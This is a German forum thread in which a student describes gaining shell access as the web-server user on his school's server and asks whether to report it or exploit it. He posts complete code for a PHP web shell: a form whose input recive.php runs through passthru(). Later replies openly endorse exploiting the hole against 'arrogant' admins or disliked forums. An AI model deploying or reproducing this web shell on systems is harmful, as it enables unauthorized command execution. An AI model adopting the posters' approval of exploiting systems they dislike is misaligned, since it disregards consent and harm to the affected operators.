Moralische Frage...

Grüß Euch!

Ich habe zwei kleine php dateien geschrieben, mit deren Hilfe man als user die Rechte des webservers erreichen kann. Ich habe es bereits am Schulserver getestet, es funktioniert problemlos. sprich: ich habe bash zugriff als "apache".

Nun zur Frage: Was ist die korrekte Vorgangsweise?

- Admin berichten?
- später ev auf diversen Mailinglists posten?
- nichts unternehmen?
(- selber ausnützen?)

Danke und tschööö, bitumen

 

nicht auf einem system, das mit sorgfalt konfiguriert wurde.

mfg

 

dann sei schön artig
der bug is aber auf sehr vielen apache maschinen drauf

 

ich habe mit dem admin geredet, er hat nicht gewusst, woher die mail an root von apache kommt
Er hat gemeint, dass er im sommer susi91 draufmacht, und ich sollte die lücke nicht ausnützen

greez, bitu

 

/me benutzt fbsd
und bei fbsd gibt standardmäßig nur für users shells, die sich wirklich auch einloggen können.

mfg

 

tja, passthru hat der admin in der schule nicht gesperrt, und der www-user unter suse heißt "wwwrun", hat ein home-verzeichnis und hat /bin/bash als shell. blöder gehts nich mehr

 

1. bei mir ist
passthru
gesperrt
2. für den user www gibt's kein login

mfg

 

schau dir den code an, den habe ich eh schon gepostet. außerdem kann ich mit

das passwort für apache ändern und dann schön via ssh einloggen

 

glaub ich irgendwie nicht.
gib mal code her

und kannst du auch auf datein oberhalb von ~ von www zugreifen oder nur unterhalb von ~

mfg

 

Danke schonmal, ich poste den code, damit ihr wisst, worum es geht:

send.html:
<html>
<form action="recive.php" method="post">
<table><tr><th>webbash</ht></tr>
<tr><td>command:<input type="text" name="bashcommand" /></td></tr>
<tr><td><input type="submit" name="sent" value="enter" /></td></tr>
</table>
</form>
</html>



recive.php:
<html>
<p>
output:
<br>
<br>

<?php
$shcommand = $_POST['bashcommand'];

$output = passthru($shcommand);
echo $output;
?>

<br>
<hr>
<a href=send.html>new command</a>
</p>
</html>

 

kommt drauf an :
is der server nur mies konfiguriert oder is dasn genereller bug in der software ?
bei letzerem würd ich den bug reporten und nen exploit bereitstellen damit die jungs auch grund haben ihr zeug zu fixen.
bei ersterem gibts zumindest für mich 2 möglichkeiten : ists ne scheiss-schule, überhebliche admins mit 0 ahnung usw... dann ausnutzen, sonst melden.

mfg Sr2k

 

Also ich würde die Admins, wenn sie was unternehmen können, informieren, damit sie das Loch stopfen können.
Allerdings in Foren, wo der Neuling einfach "n00b" genannt wird und der User der *** ist, würde ich?s ausnutzen!